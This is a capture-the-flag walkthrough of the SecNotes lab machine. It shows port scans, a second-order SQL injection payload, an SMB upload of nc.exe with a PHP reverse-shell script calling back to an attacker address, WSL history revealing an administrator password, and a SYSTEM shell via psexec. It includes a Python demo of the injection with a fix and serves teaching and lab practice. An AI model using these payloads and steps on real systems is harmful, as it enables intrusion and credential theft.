SecNotes is a challenging box that tests the user’s ability to exploit common web application vulnerabilities to uncover sensitive information and upload files to gain access to the target. This box is interesting because it is a Windows target that tests the user’s Linux knowledge as well.

Step 1: Enumerating with Nmap

As usual, the first step is to enumerate the target with Nmap. -Pn skips host discovery, since Windows hosts frequently drop ICMP and would otherwise be reported as down, and -p- scans all 65535 TCP ports, which is why this first pass takes close to two minutes.

➜  secnotes nmap -vv 10.129.3.204 -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-31 16:49 EST
Initiating Parallel DNS resolution of 1 host. at 16:49
Completed Parallel DNS resolution of 1 host. at 16:49, 0.00s elapsed
Initiating Connect Scan at 16:49
Scanning 10.129.3.204 [65535 ports]
Discovered open port 445/tcp on 10.129.3.204
Discovered open port 80/tcp on 10.129.3.204
Connect Scan Timing: About 17.72% done; ETC: 16:52 (0:02:24 remaining)
Connect Scan Timing: About 45.94% done; ETC: 16:51 (0:01:12 remaining)
Discovered open port 8808/tcp on 10.129.3.204
Completed Connect Scan at 16:51, 106.55s elapsed (65535 total ports)
Nmap scan report for 10.129.3.204
Host is up, received user-set (0.028s latency).
Scanned at 2023-01-31 16:49:18 EST for 107s
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
80/tcp   open  http          syn-ack
445/tcp  open  microsoft-ds  syn-ack
8808/tcp open  ssports-bcast syn-ack

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 106.59 seconds

It looks like we have three open ports, but beyond the port numbers and the service names guessed from Nmap's port table we know very little (8808 is not a standard port, so "ssports-bcast" means nothing here). Let's run a service and script scan against just those three ports to find out what is actually listening.

➜  secnotes nmap -vv -A 10.129.3.204 -Pn -p 80,445,8808
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-31 16:52 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:52
Completed Parallel DNS resolution of 1 host. at 16:52, 0.00s elapsed
Initiating Connect Scan at 16:52
Scanning 10.129.3.204 [3 ports]
Discovered open port 80/tcp on 10.129.3.204
Discovered open port 445/tcp on 10.129.3.204
Discovered open port 8808/tcp on 10.129.3.204
Completed Connect Scan at 16:52, 0.05s elapsed (3 total ports)
Initiating Service scan at 16:52
Scanning 3 services on 10.129.3.204
Completed Service scan at 16:53, 11.34s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.3.204.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:53
NSE Timing: About 99.76% done; ETC: 16:53 (0:00:00 remaining)
Completed NSE at 16:53, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Nmap scan report for 10.129.3.204
Host is up, received user-set (0.033s latency).
Scanned at 2023-01-31 16:52:57 EST for 52s

PORT     STATE SERVICE   REASON  VERSION
80/tcp   open  http      syn-ack Microsoft IIS httpd 10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds syn-ack Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http      syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-01-31T21:53:14
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2023-01-31T13:53:12-08:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 64449/tcp): CLEAN (Timeout)
|   Check 2 (port 26875/tcp): CLEAN (Timeout)
|   Check 3 (port 56767/udp): CLEAN (Timeout)
|   Check 4 (port 32379/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h40m00s, deviation: 4h37m09s, median: 0s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.09 seconds

We were able to gather much more information with our second Nmap scan. Ports 80 and 8808 are both IIS 10.0: port 80 redirects to a login page titled "Secure Notes - Login", while port 8808 shows the default "IIS Windows" landing page. Port 445 is SMB on Windows 10 Enterprise build 17134 in workgroup HTB, and SMB signing is enabled but not required (worth noting for relay attacks, although we will not need them here). Let's continue our investigation by navigating to the web pages.

Step 2: Exploiting the Web Application with SQL Injection

Upon visiting http://10.129.3.204/login.php we are presented with a login screen. Our first inclination is to try SQL injection to bypass the login, using the payloads collected in this cheat sheet: https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/. Every bypass attempt fails, so the login query itself appears to escape or parameterise its input. The application also offers registration, which gives us a second place to put the same strings: create an account whose username is an injection payload and see whether any later query trusts the stored value.

After creating several accounts and logging in with each, the account with username ' or 1=1# and password ' or 1=1# pays off. The login itself works normally, because it compares our exact stored string, but the notes page, which looks up notes by the logged-in username, now returns three notes, including notes that are not ours. This is a second-order SQL injection: the payload is stored safely at registration and only fires when the notes query splices the username back into SQL without escaping, where the trailing # (a MySQL line comment) discards the rest of the statement. The last of the three notes contains what appears to be login credentials:

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&
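To make the mechanism concrete, here is an added example (not code from the box or from this writeup) that models the two queries in Python against an in-memory SQLite database with constructed sample notes. Registration and login are parameterised, which is why the bypass at the login form failed, but the notes page builds its query by string formatting, so the username stored at registration is executed as SQL on the next page. SQLite has no # line comment, so the example uses the equivalent -- form; the box's back end is MySQL (a mysqld named pipe appears in the IPC$ listing later on), where ' or 1=1# works as written.

```python
import sqlite3
from typing import List, Tuple

# The page registers the username ' or 1=1#. MySQL treats # as a line comment;
# SQLite only understands --, so this is the equivalent payload for the demo.
PAYLOAD = "' OR 1=1 -- "


def setup() -> sqlite3.Connection:
    """In-memory stand-in for the notes app, seeded with constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT PRIMARY KEY, password TEXT NOT NULL);
        CREATE TABLE notes(id INTEGER PRIMARY KEY, username TEXT NOT NULL,
                           title TEXT NOT NULL, body TEXT NOT NULL);
        INSERT INTO users VALUES ('tyler', 'constructed-pw-1'), ('alice', 'constructed-pw-2');
        INSERT INTO notes(username, title, body) VALUES
            ('tyler', 'todo',     'finish the new site'),
            ('tyler', 'new-site', 'share creds: <constructed secret>'),
            ('alice', 'reminder', 'rotate the db password');
    """)
    return db


def register(db: sqlite3.Connection, username: str, password: str) -> None:
    # Parameterised: the payload is stored verbatim, as the registration form
    # on the box evidently does. Nothing is exploited at this point.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def login(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised too, which is why the classic login bypass got nowhere.
    row = db.execute("SELECT 1 FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row is not None


def notes_vulnerable(db: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # The username comes from the session, so the developer treated it as
    # trusted and spliced it in. The stored payload fires here: second-order SQLi.
    sql = "SELECT title, body FROM notes WHERE username = '%s'" % username
    return db.execute(sql).fetchall()


def notes_fixed(db: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # Same query, bound parameter: the payload is just a username with no notes.
    return db.execute("SELECT title, body FROM notes WHERE username = ?",
                      (username,)).fetchall()


def run_demo() -> dict:
    db = setup()
    register(db, PAYLOAD, PAYLOAD)
    return {
        "login_ok": login(db, PAYLOAD, PAYLOAD),
        "leaked_rows": len(notes_vulnerable(db, PAYLOAD)),  # every user's notes
        "fixed_rows": len(notes_fixed(db, PAYLOAD)),        # our own notes: none
        "tyler_rows": len(notes_fixed(db, "tyler")),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The lesson is the one the box teaches: data does not become safe because it was parameterised once on the way in. Every query that consumes it, including the ones fed from the session or the database rather than the request, has to bind it as a parameter as well.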

Where could we use these credentials? The note gives a UNC path (\\secnotes.htb\new-site) rather than a URL, and we saw port 445 open earlier, so SMB is the obvious place to try them.

Step 3: Enumerating SMB

We can try viewing the SMB shares using the found credentials with the following command:

➜  secnotes smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' -L \\10.129.3.204

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    new-site        Disk      
SMB1 disabled -- no workgroup available

We can see four shares: the three default administrative shares (ADMIN$, C$ and IPC$) and one custom share, new-site, but smbclient tells us nothing about what tyler can do with them. Let's use smbmap to list permissions and contents.

➜  secnotes smbmap -R -u "tyler" -p '92g!mA8BGjOirkL%OG*&' -H 10.129.3.204
[+] IP: 10.129.3.204:445	Name: 10.129.3.204                                      
        Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	NO ACCESS	Remote Admin
    C$                                                	NO ACCESS	Default share
    IPC$                                              	READ ONLY	Remote IPC
    .\IPC$\*
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	InitShutdown
    fr--r--r--                4 Sun Dec 31 19:03:58 1600	lsass
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	ntsvcs
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	scerpc
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-380-0
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	epmapper
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-1ec-0
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	LSM_API_service
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	eventlog
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-40c-0
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	atsvc
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-568-0
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	spoolss
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-868-0
    fr--r--r--                4 Sun Dec 31 19:03:58 1600	wkssvc
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	trkwks
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	mysqld2656_pipe
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	tapsrv
    fr--r--r--                4 Sun Dec 31 19:03:58 1600	srvsvc
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	vgauth-service
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-278-0
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	ROUTER
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	browser
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-280-0
    fr--r--r--                4 Sun Dec 31 19:03:58 1600	MsFteWds
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	SearchTextHarvester
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	PSHost.133196752503708353.6440.DefaultAppDomain.powershell
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	PSHost.133196752500396213.780.DefaultAppDomain.powershell
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	iisipm444366d6-4801-416c-a7b4-8689e057236c
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	iislogpiped3cea27d-1d29-48e3-a63a-65f61a127bcf
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	iisipm295933ca-f9e6-427e-87f0-2066493063d2
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	iislogpiped5d108b7-37fd-4737-a0e3-aeb37b909059
    fr--r--r--                3 Sun Dec 31 19:03:58 1600	W32TIME_ALT
    fr--r--r--                1 Sun Dec 31 19:03:58 1600	IISFCGI-848fb497-cd7f-4ab9-bdab-7325e18cbcff
    new-site                                          	READ, WRITE	
    .\new-site\*
    dr--r--r--                0 Tue Jan 31 17:13:03 2023	.
    dr--r--r--                0 Tue Jan 31 17:13:03 2023	..
    fr--r--r--              696 Thu Jun 21 16:15:36 2018	iisstart.htm
    fr--r--r--            98757 Thu Jun 21 16:15:38 2018	iisstart.png

We have read and write access to new-site, and its contents (iisstart.htm and iisstart.png, the default IIS landing page) match the "IIS Windows" title Nmap reported on port 8808. That strongly suggests new-site is the web root of http://10.129.3.204:8808/, which we can confirm cheaply by dropping a file into the share and requesting it over HTTP.

Step 4: Gaining Initial Access via Arbitrary File Upload

We can write into the web root served on http://10.129.3.204:8808/, but the PHP reverse shells we tried there did not call back. Instead, we upload a copy of netcat for Windows together with a small PHP script that runs it and has it connect back to our listener. A copy of nc.exe is available at https://github.com/int0x33/nc.exe; this build supports the -e option, and it is a well-known binary that endpoint protection commonly flags, although on this box it ran without interference.

First we write the PHP script. It runs nc.exe from the same directory (the web root, where we are about to upload it) and tells it to connect back to our attacking host, 10.10.16.7, on port 4444:

<?php
// Run the uploaded nc.exe (same directory as this script) with cmd.exe
// attached, connecting back to the attacker's listener at 10.10.16.7:4444.
system('nc.exe -e cmd.exe 10.10.16.7 4444');
?>

Now we need to upload the files with smbmap:

➜  secnotes smbmap -H 10.129.3.204 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --upload nc.php new-site/nc.php
[+] Starting upload: nc.php (53 bytes)
[+] Upload complete.
➜  secnotes smbmap -H 10.129.3.204 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --upload nc.exe/nc.exe new-site/nc.exe
[+] Starting upload: nc.exe/nc.exe (38616 bytes)
[+] Upload complete.

Now we need to set up our listener with netcat to catch the reverse shell.

➜  secnotes nc -lvnp 4444                              
Listening on 0.0.0.0 4444

We trigger the connection by requesting http://10.129.3.204:8808/nc.php in a web browser. The request itself never finishes loading, because PHP blocks in system() until nc.exe exits, but the listener picks up the connection almost immediately:

Connection received on 10.129.3.204 51110
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>whoami
whoami
secnotes\tyler

We can now navigate to the user’s desktop and grab the first flag.

Step 5: Escalating Privileges

After searching through the filesystem on the target, we find a Distros folder and a 201 MB Ubuntu.zip in the root of C:, which suggests that the Windows Subsystem for Linux (WSL) is installed on this box.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 1E7B-9B76

 Directory of C:\

06/21/2018  02:07 PM    <DIR>          Distros
06/21/2018  05:47 PM    <DIR>          inetpub
06/22/2018  01:09 PM    <DIR>          Microsoft
04/11/2018  03:38 PM    <DIR>          PerfLogs
06/21/2018  07:15 AM    <DIR>          php7
01/26/2021  02:39 AM    <DIR>          Program Files
01/26/2021  02:38 AM    <DIR>          Program Files (x86)
06/21/2018  02:07 PM       201,749,452 Ubuntu.zip
06/21/2018  02:00 PM    <DIR>          Users
01/26/2021  02:38 AM    <DIR>          Windows
               1 File(s)    201,749,452 bytes
               9 Dir(s)  13,896,142,848 bytes free

C:\>

This prompted us to look up WSL privilege escalation techniques, and we found the following page: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation. It lists several locations where a bash.exe that launches WSL can be found even when nothing is on the PATH. Searching the WinSxS component store, we find one at: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe. Let's run the exe and begin exploring WSL.

Step 6: Exploring WSL

Running the exe drops us straight into a Linux shell, but without a controlling tty (hence the "mesg: ttyname failed" warning and the missing prompt). Python is available inside the distribution, so we use it to spawn a proper pty:

C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5>bash.exe
bash.exe
mesg: ttyname failed: Inappropriate ioctl for device
ls
bash.exe
python --version
Python 2.7.15rc1
python -c 'import pty; pty.spawn("/bin/bash")'
root@SECNOTES:~# 

We are root inside WSL, but that is root within the Linux distribution only: anything we touch under /mnt/c still runs with tyler's Windows token, so by itself this is not an escalation on the Windows side. What it does give us is whatever the person who set up the distribution left behind. Let's check the shell history for recently run commands:

root@SECNOTES:~# history
history
    1  cd /mnt/c/
    2  ls
    3  cd Users/
    4  cd /
    5  cd ~
    6  ls
    7  pwd
    8  mkdir filesystem
    9  mount //127.0.0.1/c$ filesystem/
   10  sudo apt install cifs-utils
   11  mount //127.0.0.1/c$ filesystem/
   12  mount //127.0.0.1/c$ filesystem/ -o user=administrator
   13  cat /proc/filesystems
   14  sudo modprobe cifs
   15  smbclient
   16  apt install smbclient
   17  smbclient
   18  smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
   19  > .bash_history 
   20  less .bash_history
   21  history
root@SECNOTES:~# 

Someone used smbclient from inside WSL to log into the C$ share as administrator, and the password is sitting in plain text on the command line. Note that command 19 (> .bash_history) was meant to wipe the file, but bash writes its in-memory history back to the file when the shell exits, so the secret came straight back. Maybe we can use these credentials to log into Windows with impacket's psexec.py example script.

➜  impacket ls
build  ChangeLog.md  dist  Dockerfile  examples  impacket  impacket.egg-info  LICENSE  MANIFEST.in  README.md  requirements-test.txt  requirements.txt  SECURITY.md  setup.py  TESTING.md  tests  tox.ini
➜  impacket cd examples     
➜  examples ls
addcomputer.py  exchanger.py        GetNPUsers.py   goldenPac.py      machine_role.py   netview.py            ping.py        registry-read.py  samrdump.py     smbpasswd.py  split.py            wmipersist.py
atexec.py       findDelegation.py   getPac.py       karmaSMB.py       mimikatz.py       nmapAnswerMachine.py  psexec.py      reg.py            secretsdump.py  smbrelayx.py  ticketConverter.py  wmiquery.py
dcomexec.py     GetADUsers.py       getST.py        keylistattack.py  mqtt_check.py     ntfs-read.py          raiseChild.py  rpcdump.py        services.py     smbserver.py  ticketer.py
dpapi.py        getArch.py          getTGT.py       kintercept.py     mssqlclient.py    ntlmrelayx.py         rbcd.py        rpcmap.py         smbclient.py    sniffer.py    tstool.py
esentutl.py     Get-GPPPassword.py  GetUserSPNs.py  lookupsid.py      mssqlinstance.py  ping6.py              rdp_check.py   sambaPipe.py      smbexec.py      sniff.py      wmiexec.py
➜  examples python3 psexec.py 'administrator:u6!4ZwgwOM#^OBf#Nwnh'@10.129.3.204               
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.129.3.204.....
[*] Found writable share ADMIN$
[*] Uploading file glzytjGs.exe
[*] Opening SVCManager on 10.129.3.204.....
[*] Creating service bJAC on 10.129.3.204.....
[*] Starting service bJAC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32> whoami
nt authority\system

The found credentials work. psexec.py uploads a service binary to the writable ADMIN$ share and registers it as a service, and Windows services run as SYSTEM, which is why we are dropped into an NT AUTHORITY\SYSTEM shell rather than an Administrator one (it also leaves a new service and a dropped executable behind, both of which a defender can look for). The only step that remains is to grab the root flag from the administrator's desktop and submit.